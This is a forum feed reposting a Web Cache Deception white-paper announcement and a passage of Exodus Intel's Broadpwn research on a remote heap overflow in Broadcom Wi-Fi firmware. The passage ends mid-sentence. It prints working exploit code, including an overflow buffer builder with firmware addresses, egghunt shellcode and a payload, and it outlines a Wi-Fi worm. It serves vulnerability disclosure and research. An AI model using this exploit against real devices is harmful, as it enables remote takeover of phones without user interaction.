-
Posts
18794 -
Joined
-
Last visited
-
Days Won
742
Everything posted by Nytro
-
Wednesday, July 26, 2017 Web Cache Deception Attack: White Paper The Web Cache Deception attack vector was first published in this blog on February 2017. Since then, I presented it on Black Hat USA 2017 and BSides Tel-Aviv 2017. Now, I'm proud to release a white paper explaining all about this attack, including: - Attack methodology - Implications - Conditions - Known web frameworks and caching mechanisms that meet the attack conditions - Mitigations Web Cache Deception Attack White Paper, July 2017 In addition, you can find the presentation used in the Black Hat USA 2017 conference. Huge thanks to all those who assisted along the way: Sagi Cohen, Bill Ben Haim, Sophie Lewin, Or Kliger, Gil Biton, Yakir Mordehay, Hagar Livne Would love to receive your feedback here and on Twitter (@omer_gil). Enjoy! Posted by Omer Gil at 1:19:00 PM Sursa: https://omergil.blogspot.ro/2017/07/web-cache-deception-attack-white-paper.html
-
- 1
-
-
Posted by Exodus Intel VRT Posted on July 26, 2017 Posted under exploitation, Vulnerabilities Comments Leave a Comment Broadpwn: Remotely Compromising Android and iOS via a Bug in Broadcom’s Wi-Fi Chipsets Author: Nitay Artenstein Introduction Fully remote exploits that allow for compromise of a target without any user interaction have become something of a myth in recent years. While some are occasionally still found against insecure and unpatched targets such as routers, various IoT devices or old versions of Windows, practically no remotely exploitable bugs that reliably bypass DEP and ASLR have been found on Android and iOS. In order to compromise these devices, attackers normally resort to browser bugs. The downside of this approach, from an attacker’s perspective, is that successful exploitation requires the victim to either click on an untrusted link or connect to an attacker’s network and actively browse to a non-HTTPS site. Paranoid users will be wary against doing either of these things. It is naive to assume that a well-funded attacker will accept these limitations. As modern operating systems become hardened, attackers are hard at work looking for new, powerful and inventive attack vectors. However, remote exploits are not a simple matter. Local attacks benefit from an extensive interaction with the targeted platform using interfaces such as syscalls or JavaScript, which allows the attacker to make assumptions about the target’s address space and memory state. Remote attackers, on the other hand, have a much more limited interaction with the target. In order for a remote attack to be successful, the bug on which it is based needs to allow the attacker to make as few assumptions as possible about the target’s state. This research is an attempt to demonstrate what such an attack, and such a bug, will look like. Broadpwn is a fully remote attack against Broadcom’s BCM43xx family of WiFi chipsets, which allows for code execution on the main application processor in both Android and iOS. It is based on an unusually powerful 0-day that allowed us to leverage it into a reliable, fully remote exploit. In this post, we will describe our thought process in choosing an attack surface suitable for developing a fully remote exploit, explain how we honed in on particular code regions in order to look for a bug that can be triggered without user interaction, and walk through the stages of developing this bug into a reliable, fully remote exploit. We will conclude with a bonus. During the early 2000s, self-propagating malware – or “worms” – were common. But the advent of DEP and ASLR largely killed off remote exploitation, and Conficker (2009) will be remembered as the last self-propagating network worm. We will revive this tradition by turning Broadpwn into the first WiFi worm for mobile devices, and the first public network worm in eight years. THE ATTACK SURFACE Two words make up an attacker’s worst nightmare when considering remote exploitation: DEP and ASLR. In order to leverage a bug into a full code execution primitive, some knowledge of the address space is needed. But with ASLR enabled, such knowledge is considerably more difficult to obtain, and sometimes requires a separate infoleak. And, generally speaking, infoleaks are harder to obtain on remote attack surfaces, since the target’s interaction with the attacker is limited. Over the past decade, hundreds of remote bugs have died miserable deaths due to DEP and ASLR. Security researchers who work with embedded systems don’t have such troubles. Routers, cameras, and various IoT devices typically have no security mitigation enabled. Smartphones are different: Android and iOS have had ASLR enabled from a relatively early stage [a]. But this definition is misleading, since it refers only to code running on the main application processor. A smartphone is a complex system. Which other processors exist in a phone? Most Android and iOS smartphones have two additional chips which are particularly interesting to us from a remote standpoint: the baseband and the WiFi chipset. The baseband is a fascinating and large attack surface, and it doubtlessly draws the attention of many attackers. However, attacking basebands is a difficult business, mainly due to fragmentation. The baseband market is currently going through a major shift: If, several years ago, Qualcomm were the unchallenged market leaders, today the market has split up into several competitors. Samsung’s Shannon modems are prevalent in most of the newer Samsungs; Intel’s Infineon chips have taken over Qualcomm as the baseband for iPhone 7 and above; and MediaTek’s chips are a popular choice for lower cost Androids. And to top it off, Qualcomm is still dominant in higher end non-Samsung Androids. WiFi chipsets are a different story: Here, Broadcom are still the dominant choice for most popular smartphones, including most Samsung Galaxy models, Nexus phones and iPhones. A peculiar detail makes the story even more interesting. On laptops and desktop computers, the WiFi chipset generally handles the PHY layer while the kernel driver is responsible for handling layer 3 and above. This is known as a SoftMAC implementation. On mobile devices, however, power considerations often cause the device designers to opt for a FullMAC WiFi implementation, where the WiFi chip is responsible for handling the PHY, MAC and MLME on its own, and hands the kernel driver data packets that are ready to be sent up. Which means, of course, that the chip handles considerable attacker-controlled input on its own. Another detail sealed our choice. Running some tests on Broadcom’s chips, we realised with joy that there was no ASLR and that the whole of RAM has RWX permissions – meaning that we can read, write and run code anywhere in memory. While the same holds partially true for Shannon and MediaTek basebands, Qualcomm basebands do support DEP and are therefore somewhat harder to exploit. Before we continue, it should be mentioned that a considerable drawback exists when attacking the WiFi chip. The amount of code running on WiFi chipsets is considerably smaller than code running on basebands, and the 802.11 family of protocols is significantly less complicated to implement than the nightmarish range of protocols that basebands have to implement, including GSM and LTE. On a BCM4359 WiFi SoC, we identified approximately 9,000 functions. On a Shannon baseband, there are above 80,000. That means that a reasonably determined effort at code auditing on Broadcom’s part has a good chance of closing off many exploitable bugs, making an attacker’s life much harder. Samsung would need to put in considerably more effort to arrive at the same result. THE BCM43XX FAMILY Broadcom’s WiFi chips are the dominant choice for the WiFi slot in high-end smartphones. In a non-exhaustive research, we’ve found that the following models use Broadcom WiFi chips: Samsung Galaxy from S3 through S8, inclusive2 All Samsung Notes3. Nexus 5, 6, 6X and 6P4 All iPhones after iPhone 5 The chip model range from BCM4339 for the oldest phones (notably Nexus 5) up to BCM4361 for the Samsung Galaxy S8. This research was carried out on both a Samsung Galaxy S5 (BCM4354) and a Samsung Galaxy S7 (BCM4359), with the main exploit development process taking place on the S7. Reverse engineering and debugging the chip’s firmware is made relatively simple by the fact that the unencrypted firmware binary is loaded into the chip’s RAM by the main OS every time after the chip is reset, so a simple search through the phone’s system will usually suffice to locate the Broadcom firmware. On Linux kernels, its path is usually defined in the config variable BCMDHD_FW_PATH. Another blessing is that there is no integrity check on the firmware, so it’s quite easy to patch the original firmware, add hooks that print debugging output or otherwise modify its behaviour, and modify the kernel to load our firmware instead. A lot of this research was carried out by placing hooks at the right places and observing the system’s behaviour (and more interestingly, its misbehaviour). All the BCM chips that we’ve observed run an ARM Cortex-R4 microcontroller. One of the system’s main quirks is that a large part of the code runs on the ROM, whose size is 900k. Patches, and additional functionality, are added to the RAM, also 900k in size. In order to facilitate patching, an extensive thunk table is used in RAM, and calls are made into that table at specific points during execution. Should a bug fix be issued, the thunk table could be changed to redirect to the newer code. In terms of architecture, it would be correct to look at the BCM43xx as a WiFi SoC, since two different chips handle packet processing. While the main processor, the Cortex-R4, handles the MAC and MLME layers before handing the received packets to the Linux kernel, a separate chip, using a proprietary Broadcom processor architecture, handles the 802.11 PHY layer. Another component of the SoC is the interface to the application processor: Older BCM chips used the slower SDIO connection, while BCM4358 and above use PCIe. The main ARM microcontroller in the WiFi SoC runs a mysterious proprietary RTOS known as HNDRTE. While HNDRTE is closed-source, there are several convenient places to obtain older versions of the source code. Previous researchers have mentioned the Linux brcmsmac driver, a driver for SoftMAC WiFi chips which handle only the PHY layer while letting the kernel do the rest. While this driver does contain source code which is also common to HNDRTE itself, we found that that most of the driver code which handles packet processing (and that’s where we intended to find bugs) was significantly different to the one found in the firmware, and therefore did not help us with reversing the interesting code areas. The most convenient resource we found was the source code for the VMG-1312, a forgotten router which also uses a Broadcom chipset. While the brcmsmac driver contains code which was open-sourced by Broadcom for use with Linux, the VMG-1312 contains proprietary Broadcom closed-source code, bearing the warning “This is UNPUBLISHED PROPRIETARY SOURCE CODE of Broadcom Corporation”. Apparently, the Broadcom code was published by mistake together with the rest of the VMG-1312 sources. The leaked code contains most of the key functions we find in the firmware blob, but it appears to be dated, and does not contain much of the processing code for the newer 802.11 protocols. Yet it was extremely useful during the course of this research, since the main packet handling functions have not changed much. By comparing the source code with the firmware, we were able to get a quick high-level view of the packet processing code section, which enabled us to hone in on interesting code areas and focus on the next stage: finding a suitable bug. FINDING THE RIGHT BUG By far, the biggest challenge in developing a fully remote attack is finding a suitable bug. In order to be useful, the right bug will need to meet all the following requirements: It will be triggered without requiring interaction on behalf of the victim It will not require us to make assumptions about the state of the system, since our ability to leak information is limited in a remote attack After successful exploitation, the bug will not leave the system in an unstable state Finding a bug that can be triggered without user interaction is a tall order. For example, CVE-2017-0561, which is a heap-overflow in Broadcom’s TDLS implementation discovered by Project Zero, still requires the attacker and the victim to be on the same WPA2 network. This means the attackers either need to trick the victim to connect to a WPA2 network that they control, or be able to connect to a legitimate WPA2 network which the victim is already on. So where can we find a more suitable bug? To answer that question, let’s look briefly at the 802.11 association process. The process begins with the client, called mobile station (STA) in 802.11 lingo, sending out Probe Request packets to look for nearby Access Points (APs) to connect to. The Probe Requests contain data rates supported by the STA, as well as 802.11 capabilities such as 802.11n or 802.11ac. They will also normally contain a list of preferred SSIDs that the STA has previously connected to. In the next phase, an AP that supports the advertised data rates will send a Probe Response containing data such as supported encryption types and 802.11 capabilities of the AP. After that, the STA and the AP will both send out Authentication Open Sequence packets, which are an obsolete leftover from the days WLAN networks were secured by WEP. In the last phase of the association process, a STA will send an Association Request to the AP it has chosen to connect to. This packet will include the chosen encryption type, as well as various other data about the STA. All the packet types in the above association sequence have the same structure: A basic 802.11 header, followed by a series of 802.11 Information Elements (IEs). The IEs are encoded using the well known TLV (Type-Length-Value) convention, with the first byte of the IE denoting the type of information, the second byte holding its length, and the next bytes hold the actual data. By parsing this data, both the AP and the STA get information about the requirements and capabilities of their counterpart in the association sequence. Any actual authentication, implemented using protocols such as WPA2, happens only after this association sequence. Since there are no real elements of authentication within the association sequence, it’s possible to impersonate any AP using its MAC address and SSID. The STA will only be able to know that the AP is fake during the later authentication phase. This makes any bug during the association sequence especially valuable. An attacker who finds a bug in the association process will be able to sniff the victim’s probe requests over the air, impersonate an AP that the STA is looking for, then trigger the bug without going through any authentication. When looking for the bug, we were assisted by the highly modular way in which Broadcom’s code handles the different protocols in the 802.11 family and the different functionalities of the firmware itself. The main relevant function in this case is wlc_attach_module, which abstracts each different protocol or functionality as a separate module. The names of the various initialization functions that wlc_attach_module calls are highly indicative. This is some sample code: prot_g = wlc_prot_g_attach(wlc); wlc->prot_g = prot_g; if (!prot_g) { goto fail; } prot_n = wlc_prot_n_attach(wlc); wlc->prot_n = prot_n; if (!prot_n) { goto fail; } ccx = wlc_ccx_attach(wlc); wlc->ccx = ccx; if (!ccx) { goto fail; } amsdu = wlc_amsdu_attach(wlc); wlc->amsdu = amsdu; if (!amsdu) { goto fail; } Each module initialization function then installs handlers which are called whenever a packet is received or generated. These callbacks are responsible for either parsing the contexts of a received packet which are relevant for a specific protocol, or generating the protocol-relevant data for an outgoing packet. We’re mostly interested in the latter, since this is the code which parses attacker-controlled data, so the relevant function here is wlc_iem_add_parse_fn, which has the following prototype: void wlc_iem_add_parse_fn(iem_info *iem, uint32 subtype_bitfield, uint32 iem_type, callback_fn_t fn, void *arg) The second and third arguments are particularly relevant here. subtype_bitfield is a bitfield containing the different packet subtypes (such as probe request, probe response, association request etc.) that the parser is relevant for. The third argument, iem_type, contains the IE type (covered earlier) that this parser is relevant for. wlc_iem_add_parse_fn is called by the various module initialization functions in wlc_module_attach. By writing some code to parse the arguments passed to it, we can make a list of the parsers being called for each phase of the association sequence. By narrowing our search down to this list, we can avoid looking for bugs in areas of the code which don’t interest us: areas which occur only after the user has completed the full association and authentication process with an AP. Any bug that we might find in those areas will fail to meet our most important criteria – the ability to be triggered without user interaction. Using the approach above, we became lucky quite soon. In fact, it took us time to realise how lucky. THE BUG Wireless Multimedia Extensions (WMM) are a Quality-of-Service (QoS) extension to the 802.11 standard, enabling the Access Point to prioritize traffic according to different Access Categories (ACs), such as voice, video or best effort. WMM is used, for instance, to insure optimal QoS for especially data-hungry applications such as VoIP or video streaming. During a client’s association process with an AP, the STA and AP both announce their WMM support level in an Information Element (IE) appended to the end of the Beacon, Probe Request, Probe Response, Association Request and Association Response packets. In our search for bugs in functions that parse association packets after being installed by wlc_iem_add_parse_fn, we stumbled upon the following function: void wlc_bss_parse_wme_ie(wlc_info *wlc, ie_parser_arg *arg) { unsigned int frame_type; wlc_bsscfg *cfg; bcm_tlv *ie; unsigned char *current_wmm_ie; int flags; frame_type = arg->frame_type; cfg = arg->bsscfg; ie = arg->ie; current_wmm_ie = cfg->current_wmm_ie; if ( frame_type == FC_REASSOC_REQ ) { ... <handle reassociation requests> ... } if ( frame_type == FC_ASSOC_RESP ) { ... if ( wlc->pub->_wme ) { if ( !(flags & 2) ) { ... if ( ie ) { ... cfg->flags |= 0x100u; memcpy(current_wmm_ie, ie->data, ie->len); In a classic bug, the program calls memcpy() in the last line without verifying that the buffer current_wmm_ie (our name) is large enough to hold the data of size ie->len. But it’s too early to call it a bug: let’s see where current_wmm_ie is allocated to figure out whether it really is possible to overflow. We can find the answer in the function which allocates the overflowed structure: wlc_bsscfg *wlc_bsscfg_malloc(wlc_info *wlc) { wlc_info *wlc; wlc_bss_info *current_bss; wlc_bss_info *target_bss; wlc_pm_st *pm; wmm_ie *current_wmm_ie; ... current_bss = wlc_calloc(0x124); wlc->current_bss = current_bss; if ( !current_bss ) { goto fail; } target_bss = wlc_calloc(0x124); wlc->target_bss = target_bss; if ( !target_bss ) { goto fail; } pm = wlc_calloc(0x78); wlc->pm = pm; if ( !pm ) { goto fail; } current_wmm_ie = wlc_calloc(0x2C); wlc->current_wmm_ie = current_wmm_ie; if ( !current_wmm_ie ) { goto fail; } As we can see in the last section, the current_wmm_ie buffer is allocated with a length of 0x2c (44) bytes, while the maximum size for an IE is 0xff (255) bytes. This means that we have a nice maximum overflow of 211 bytes. But an overflow would not necessarily get us very far. For example, CVE-2017-0561 (the TDLS bug) is hard to exploit because it only allows the attacker to overflow the size field of the next heap chunk, requiring complicated heap acrobatics in order to get a write primitive, all the while corrupting the state of the heap and making execution restoration more difficult. As far as we know, this bug could land us in the same bad situation. So let’s understand what exactly is being overflowed here. Given that the HNDRTE implementation of malloc() allocates chunks from the top of memory to the bottom, we can assume, by looking at the above code, that the wlc->pm struct will be allocated immediately following the wlc->current_wmm_ie struct which is the target of the overflow. To validate this assumption, let’s look at a hex dump of current_wmm_ie, which on the BCM4359 that we tested was always allocated at 0x1e7dfc: 00000000: 00 50 f2 02 01 01 00 00 03 a4 00 00 27 a4 00 00 .P..........'... 00000010: 42 43 5e 00 62 32 2f 00 00 00 00 00 00 00 00 00 BC^.b2/......... 00000020: c0 0b e0 05 0f 00 00 01 00 00 00 00 7a 00 00 00 ............z... 00000030: 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 64 7a 1e 00 00 00 00 00 b4 7a 1e 00 00 00 00 00 dz.......z...... 00000050: 00 00 00 00 00 00 00 00 c8 00 00 00 c8 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 9c 81 1e 00 1c 81 1e 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000a0: 00 00 00 00 00 00 00 00 2a 01 00 00 00 c0 ca 84 ........*....... 000000b0: ba b9 06 01 0d 62 72 6f 61 64 70 77 6e 5f 74 65 .....broadpwn_te 000000c0: 73 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 st.............. 000000d0: 00 00 00 00 00 00 fb ff 23 00 0f 00 00 00 01 10 ........#....... 000000e0: 01 00 00 00 0c 00 00 00 82 84 8b 0c 12 96 18 24 ...............$ 000000f0: 30 48 60 6c 00 00 00 00 00 00 00 00 00 00 00 00 0H`l............ Looking at offset 0x2c, which is the end of current_wmm_ie, we can see the size of the next heap chunk, 0x7a – which is the exact size of the wlc->pm struct plus a two byte alignment. This validates our assumption, and means that our overflow always runs into wlc->pm, which is a struct of type wlc_pm_st. It’s worthwhile to note that the position of both current_wmm_ie and pm is completely deterministic given a firmware version. Since these structures are allocated early in the initialization process, they will always be positioned at the same addresses. This fortunately spares us the need for complicated heap feng-shui – we always overflow into the same address and the same structure. THE EXPLOIT Finding a bug was the easy part. Writing a reliable remote exploit is the hard part, and this is usually where a bug is found to be either unexploitable or so difficult to exploit as to be impractical. In our view, the main difficulty in writing a remote exploit is that some knowledge is needed about the address space of the attacked program. The other difficulty is that mistakes are often unforgivable: in a kernel remote exploit, for instance, any misstep will result in a kernel panic, immediately alerting the victim that something is wrong – especially if the crash is repeated several times. In Broadpwn, both of these difficulties are mitigated by two main lucky facts: First, the addresses of all the relevant structures and data that we will use during the exploit are consistent for a given firmware build, meaning that we do not need any knowledge of dynamic addresses – after testing the exploit once on a given firmware build, it will be consistently reproducible. Second, crashing the chip is not particularly noisy. The main indication in the user interface is the disappearance of the WiFi icon, and a temporary disruption of connectivity as the chip resets. This creates a situation where it’s possible to build a dictionary of addresses for a given firmware, then repeatedly launch the exploit until we have brute forced the correct set of addresses. A different, experimental solution, which does not require knowledge of any version-specific addresses, is given at the end of this section. Let’s first look at how we achieve a write primitive. The overflowed structure is of type wlc_pm_st, and handles power management states, including entering and leaving power-saving mode. The struct is defined as follows: typedef struct wlc_pm_st { uint8 PM; bool PM_override; mbool PMenabledModuleId; bool PMenabled; bool PMawakebcn; bool PMpending; bool priorPMstate; bool PSpoll; bool check_for_unaligned_tbtt; uint16 pspoll_prd; struct wl_timer *pspoll_timer; uint16 apsd_trigger_timeout; struct wl_timer *apsd_trigger_timer; bool apsd_sta_usp; bool WME_PM_blocked; uint16 pm2_rcv_percent; pm2rd_state_t pm2_rcv_state; uint16 pm2_rcv_time; uint pm2_sleep_ret_time; uint pm2_sleep_ret_time_left; uint pm2_last_wake_time; bool pm2_refresh_badiv; bool adv_ps_poll; bool send_pspoll_after_tx; wlc_hwtimer_to_t *pm2_rcv_timer; wlc_hwtimer_to_t *pm2_ret_timer; } wlc_pm_st_t; Four members of this struct are especially interesting to control from an exploitation viewpoint: pspoll_timer and apsd_trigger_timer of type wl_timer, and pm2_rcv_timer and pm2_ret_timer of type wlc_hwtimer_to_t. First let’s look at the latter. typedef struct _wlc_hwtimer_to { struct _wlc_hwtimer_to *next; uint timeout; hwtto_fn fun; void *arg; bool expired; } wlc_hwtimer_to_t; The function wlc_hwtimer_del_timeout is called after processing the packet and triggering the overflow, and receives pm2_ret_timer as an argument: void wlc_hwtimer_del_timeout(wlc_hwtimer_to *newto) { wlc_hwtimer_to *i; wlc_hwtimer_to *next; wlc_hwtimer_to *this; for ( i = &newto->gptimer->timer_list; ; i = i->next ) { this = i->next; if ( !i->next ) { break; } if ( this == newto ) { next = newto->next; if ( newto->next ) { next->timeout += newto->timeout; // write-4 primitive } i->next = next; this->fun = 0; return; } } } As can be seen from the code, by overwriting the value of newto and causing it to point to an attacker controlled location, the contents of the memory location pointed to by next->timeout can be incremented by the memory contents of newto->timeout. This amounts to a write-what-where primitive, with the limitation that the original contents of the overwritten memory location must be known. A less limited write primitive can be achieved through using the pspoll_timer member, of type struct wl_timer. This struct is handled by a callback function triggered regularly during the association process : int timer_func(struct wl_timer *t) { prev_cpsr = j_disable_irqs(); v3 = t->field_20; ... if ( v3 ) { v7 = t->field_18; v8 = &t->field_8; if ( &t->field_8 == v7 ) { ... } else { v9 = t->field_1c; v7->field_14 = v9; *(v9 + 16) = v7; if ( *v3 == v8 ) { v7->field_18 = v3; } } t->field_20 = 0; } j_restore_cpsr(prev_cpsr); return 0; } As can be seen towards the end of the function, we have a much more convenient write primitive here. Effectively, we can write the value we store in field_1c into an address we store in field_18. With this, we can write an arbitrary value into any memory address, without the limitations of the previous write primitive we found. The next question is how to leverage our write primitive into full code execution. For this, two approaches will be considered: one which requires us to know firmware memory addresses in advance (or to brute force those addresses by crashing the chip several times), and another method, more difficult to implement, which requires a minimum of that knowledge. We’ll look at the former approach first. To achieve a write primitive, we need to overwrite pspoll_timer with a memory address that we control. Since the addresses of both wlc->current_wmm_ie and wlc->ps are known and consistent for a given firmware build, and since we can fully overwrite their contents, we can clobber pspoll_timer to point anywhere within these objects. For the creation of a fake wl_timer object, the unused area between wlc->current_wmm_ie and wlc->ps is an ideal fit. Placing our fake timer object there, we’ll cause field_18 to point to an address we want to overwrite (minus an offset of 14) and have field_1c hold the contents we want to overwrite that memory with. After we trigger the overwrite, we only need to wait for the timer function to be called, and do our overwrite for us. The next stage is to determine which memory address do we want to overwrite. As can be seen in the above function, immediately after we trigger our overwrite, a call to j_restore_cpsr is made. This function basically does one thing: it refers to the function thunk table found in RAM (mentioned previously when we described HNDRTE and the BCM43xx architecture), pulls the address of restore_cpsr from the thunk table, and jumps to it. Therefore, by overwriting the index of restore_cpsr in the thunk table, we can cause our own function to be called immediately afterwards. This has the advantage of being portable, since both the starting address of the thunk table and the index of the pointer to restore_cpsr within it are consistent between firmware builds. We have now obtained control of the instruction pointer and have a fully controlled jump to an arbitrary memory address. This is made sweeter by the fact that there are no restrictions on memory permissions – the entire RAM memory is RWX, meaning we can execute code from the heap, the stack or wherever else we choose. But we still face a problem: finding a good location to place our shellcode is an issue. We can write the shellcode to the wlc->pm struct that we are overflowing, but this poses two difficulties: first, our space is limited by the fact that we only have an overwrite of 211 bytes. Second, the wlc->pm struct is constantly in use by other parts of the HNDRTE code, so placing our shellcode at the wrong place within the structure will cause the whole system to crash. After some trial and error, we realized that we had a tiny amount of space for our code: 12 bytes within the wlc->pm struct (the only place where overwriting data in the struct would not crash the system), and 32 bytes in an adjacent struct which held an SSID string (which we could freely overwrite). 44 bytes of code are not a particularly useful payload – we’ll need to find somewhere else to store our main payload. The normal way to solve such a problem in exploits is to look for a spray primitive: we’ll need a way to write the contents of large chunks of memory, giving us a convenient and predictable location to store our payload. While spray primitives can be an issue in remote exploits, since sometimes the remote code doesn’t give us a sufficient interface to write large chunks of memory, in this case it was easier than expected – in fact, we didn’t even need to go through the code to look for suitable allocation primitives. We just had to use common sense. Any WiFi implementation will need to handle many packets at any given time. For this, HNDRTE provides the implementation of a ring buffer common to the D11 chip and the main microcontroller. Packets arriving over PHY are repeatedly written to this buffer until it gets filled, and which point new packets are simply written to the beginning of the buffer and overwrite any existing data there. For us, this means that all we need to do is broadcast our payload over the air and over multiple channels. As the WiFi chip repeatedly scans for available APs (this is done every few seconds even when the chip is in power saving mode), the ring buffer gets filled with our payload – giving us the perfect place to jump to and enough space to store a reasonably sized payload. What we’ll do, therefore, is this: write a small stub of shellcode within wlc->pm, which saves the stack frame (so we can restore normal execution afterwards) and jumps to the next 32 bytes of shellcode which we store in the unused SSID string. This compact shellcode is nothing else than classic egghunting shellcode, which searches the ring buffer for a magic number which indicates the beginning of our payload, then jumps to it. So, time to look at the POC code. This is how the exploit buffer is crafted: u8 *generate_wmm_exploit_buf(u8 *eid, u8 *pos) { uint32_t curr_len = (uint32_t) (pos - eid); uint32_t overflow_size = sizeof(struct exploit_buf_4359); uint32_t p_patch = 0x16010C; // p_restore_cpsr uint32_t buf_base_4359 = 0x1e7e02; struct exploit_buf_4359 *buf = (struct exploit_buf_4359 *) pos; memset(pos, 0x0, overflow_size); memcpy(&buf->pm_st_field_40_shellcode_start_106, shellcode_start_bin, sizeof(shellcode_start_bin)); // Shellcode thunk buf->ssid.ssid[0] = 0x41; buf->ssid.ssid[1] = 0x41; buf->ssid.ssid[2] = 0x41; memcpy(&buf->ssid.ssid[3], egghunt_bin, sizeof(egghunt_bin)); buf->ssid.size = sizeof(egghunt_bin) + 3; buf->pm_st_field_10_pspoll_timer_58 = buf_base_4359 + offsetof(struct exploit_buf_4359, t_field_0_2); // Point pspoll timer to our fake timer object buf->pm_st_size_38 = 0x7a; buf->pm_st_field_18_apsd_trigger_timer_66 = 0x1e7ab4; buf->pm_st_field_28_82 = 0xc8; buf->pm_st_field_2c_86 = 0xc8; buf->pm_st_field_38_pm2_rcv_timer_98 = 0x1e819c; buf->pm_st_field_3c_pm2_ret_timer_102 = 0x1e811c; buf->pm_st_field_78_size_162 = 0x1a2; buf->bss_info_field_0_mac1_166 = 0x84cac000; buf->bss_info_field_4_mac2_170 = 0x106b9ba; buf->t_field_20_34 = 0x200000; buf->t_field_18_26 = p_patch - 0x14; // Point field_18 to the restore_cpsr thunk buf->t_field_1c_30 = buf_base_4359 + offsetof(struct exploit_buf_4359, pm_st_field_40_shellcode_start_106) + 1; // Write our shellcode address to the thunk curr_len += overflow_size; pos += overflow_size; return pos; } struct shellcode_ssid { unsigned char size; unsigned char ssid[31]; } STRUCT_PACKED; struct exploit_buf_4359 { uint16_t stub_0; uint32_t t_field_0_2; uint32_t t_field_4_6; uint32_t t_field_8_10; uint32_t t_field_c_14; uint32_t t_field_10_18; uint32_t t_field_14_22; uint32_t t_field_18_26; uint32_t t_field_1c_30; uint32_t t_field_20_34; uint32_t pm_st_size_38; uint32_t pm_st_field_0_42; uint32_t pm_st_field_4_46; uint32_t pm_st_field_8_50; uint32_t pm_st_field_c_54; uint32_t pm_st_field_10_pspoll_timer_58; uint32_t pm_st_field_14_62; uint32_t pm_st_field_18_apsd_trigger_timer_66; uint32_t pm_st_field_1c_70; uint32_t pm_st_field_20_74; uint32_t pm_st_field_24_78; uint32_t pm_st_field_28_82; uint32_t pm_st_field_2c_86; uint32_t pm_st_field_30_90; uint32_t pm_st_field_34_94; uint32_t pm_st_field_38_pm2_rcv_timer_98; uint32_t pm_st_field_3c_pm2_ret_timer_102; uint32_t pm_st_field_40_shellcode_start_106; uint32_t pm_st_field_44_110; uint32_t pm_st_field_48_114; uint32_t pm_st_field_4c_118; uint32_t pm_st_field_50_122; uint32_t pm_st_field_54_126; uint32_t pm_st_field_58_130; uint32_t pm_st_field_5c_134; uint32_t pm_st_field_60_egghunt_138; uint32_t pm_st_field_64_142; uint32_t pm_st_field_68_146; // <- End uint32_t pm_st_field_6c_150; uint32_t pm_st_field_70_154; uint32_t pm_st_field_74_158; uint32_t pm_st_field_78_size_162; uint32_t bss_info_field_0_mac1_166; uint32_t bss_info_field_4_mac2_170; struct shellcode_ssid ssid; } STRUCT_PACKED; And this is the shellcode which carries out the egghunt: __attribute__((naked)) voidshellcode_start(void) { asm("push {r0-r3,lr}\n" "bl egghunt\n" "pop {r0-r3,pc}\n"); } void egghunt(unsigned int cpsr) { unsigned int egghunt_start = RING_BUFFER_START; unsigned int *p = (unsigned int *) egghunt_start; void (*f)(unsigned int); loop: p++; if (*p != 0xc0deba5e) goto loop; f = (void (*)(unsigned int))(((unsigned char *) p) + 5); f(cpsr); return; } So we have a jump to our payload, but is that all we need to do? Remember that we have seriously corrupted the wlc->pm object, and the system will not remain stable for long if we leave it that way. Also recall that one of our main objectives is to avoid crashing the system – an exploit which gives an attacker transient control is of limited value. Therefore, before any further action, our payload needs to restore the wlc->pm object to its normal condition. Since all addresses in this object are consistent for a given firmware build, we can just copy these values back into the buffer and restore the object to a healthy state. Here’s an example for what an initial payload will look like: unsigned char overflow_orig[] = { 0x00, 0x00, 0x03, 0xA4, 0x00, 0x00, 0x27, 0xA4, 0x00, 0x00, 0x42, 0x43, 0x5E, 0x00, 0x62, 0x32, 0x2F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x0B, 0xE0, 0x05, 0x0F, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x7A, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x7A, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB4, 0x7A, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xC8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9C, 0x81, 0x1E, 0x00, 0x1C, 0x81, 0x1E, 0x00 }; void entry(unsigned int cpsr) { int i = 0; unsigned int *p_restore_cpsr = (unsigned int *) 0x16010C; *p_restore_cpsr = (unsigned int) restore_cpsr; printf("Payload triggered, restoring CPSR\n"); restore_cpsr(cpsr); printf("Restoring contents of wlc->pm struct\n"); memcpy((void *) (0x1e7e02), overflow_orig, sizeof(overflow_orig)); return; } At this stage, we have achieved our first and most important mission: we have reliable, consistent RCE against the BCM chip, and our control of the system is not transient – the chip does not crash following the exploit. At this point, the only way we will lose control of the chip is if the user turns off WiFi or if the chip crashes. THE EXPLOIT – SECOND APPROACH As we mentioned, there is still a problem with the above approach. For each firmware build, we’ll need to determine the correct memory addresses to be used in the exploit. And while those addresses are guaranteed to be consistent for a given build, we should still look for a way to avoid the hard work of compiling address tables for each firmware version. The main problem is that we need a predictable memory address whose contents we control, so we can overwrite the pspoll_timer pointer and redirect it to our fake timer object. The previous approach relied on the fact that the address of wlc->pm is consistent for a given firmware build. But there’s another buffer whose address we already know: the ring buffer. And in this case, there’s an added advantage: its beginning address seems to be the same across the board for a specific chip type, regardless of build or version number. For the BCM4359, the ring buffer’s beginning address is 0x221ec0. Therefore, if we ensure a packet we control will be written exactly to the beginning of the ring buffer, we can place our fake timer object there, and our payload immediately after it. Of course, making sure that our packet is put exactly at the beginning of the buffer is a serious challenge: We may be in an area with dozens of other APs and STAs, increasing the noise level and causing us to contend with many other packets. In order to win the contest for the desired spot in the ring buffer, we have set up a dozen Alfa wireless adapters, each broadcasting on a different channel. By causing them to simultaneously bombard the air with packets on all channels, we have reached a situation where we successfully grab the first slot in the ring buffer about 70% of the time. Of course, this result could radically change if we move to a more crowded WiFi 